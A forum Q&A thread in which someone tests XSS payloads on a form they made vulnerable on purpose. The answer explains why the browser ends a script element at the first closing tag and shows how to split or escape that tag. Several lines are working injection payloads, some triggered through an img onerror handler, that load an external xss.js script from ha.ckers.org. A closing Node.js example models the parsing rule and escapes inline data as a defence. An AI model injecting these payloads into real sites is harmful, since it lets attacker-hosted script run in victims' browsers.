load external javascript in the syntax
How do I load an external .js script using this syntax?:
<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
For all those wondering, I set up a test form I made purposely vulnerable, but I couldn't get this to launch, and yes, I know:
<script src=//ha.ckers.org/xss.js></script>
Could easily work, but I'm just trying to figure out how I could do it using document.write.
Thanks to anyone who is able to help me.
//Edit Why doesn't this work?
<img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\\/script>')>
What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then hand that intervening text off to the JavaScript engine.
In your case, what it sees between <script> and </script> is:
document.write('<script src=http://ha.ckers.org/xss.js>
...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:
<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->
You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \\:
<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>
or break the string:
<script>document.write('<script src=http://ha.ckers.org/xss.js></scr' + 'ipt>')</script>
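The parsing rule described in the answer, as an added example that is not part of the original post: a simplified Node.js model of where the parser ends a script element, run over constructed samples of the three forms above, plus a serialiser that keeps server-embedded data from ever containing the literal sequence. The function names and the cdn.example URL are assumptions made for the example.

```javascript
// Added example (Node.js). Simplified model of the HTML tokenizer's rule for
// script content: the element ends at the first "</script" followed by
// whitespace, "/" or ">". The tokenizer's "<!--" escape states are not modelled.
const END_TAG = /<\/script[\t\n\f\r \/>]/i;

// Text the parser would hand to the JavaScript engine for the first
// <script> element in `html` (null if there is no script element).
function scriptBodySeenByParser(html) {
  const open = /<script\b[^>]*>/i.exec(html);
  if (!open) return null;
  const rest = html.slice(open.index + open[0].length);
  const end = END_TAG.exec(rest);
  return end ? rest.slice(0, end.index) : rest;
}

// True if `source` compiles as JavaScript. new Function only compiles here;
// the resulting function is never called, so nothing in `source` runs.
function parsesAsScript(source) {
  try {
    new Function(source);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Mitigation when a server embeds data in an inline script block: escape
// every "<" so no value can contain a literal "</script" or "<!--".
function jsonForInlineScript(value) {
  return JSON.stringify(value).replace(/</g, '\\u003c');
}

// Constructed samples of the three forms in the answer (placeholder URL).
const SAMPLES = {
  literal: String.raw`<script>document.write('<script src=//cdn.example/a.js></script>')</script>`,
  escaped: String.raw`<script>document.write('<script src=//cdn.example/a.js><\/script>')</script>`,
  split: String.raw`<script>document.write('<script src=//cdn.example/a.js></scr' + 'ipt>')</script>`,
};

for (const [name, html] of Object.entries(SAMPLES)) {
  const body = scriptBodySeenByParser(html);
  console.log(name.padEnd(8), parsesAsScript(body) ? 'parses ' : 'SYNTAX ', body);
}
```

The same rule is why untrusted strings placed inside an inline script block need the "<" escaped on output: the HTML parser finds the end tag before the JavaScript engine ever sees the string literal.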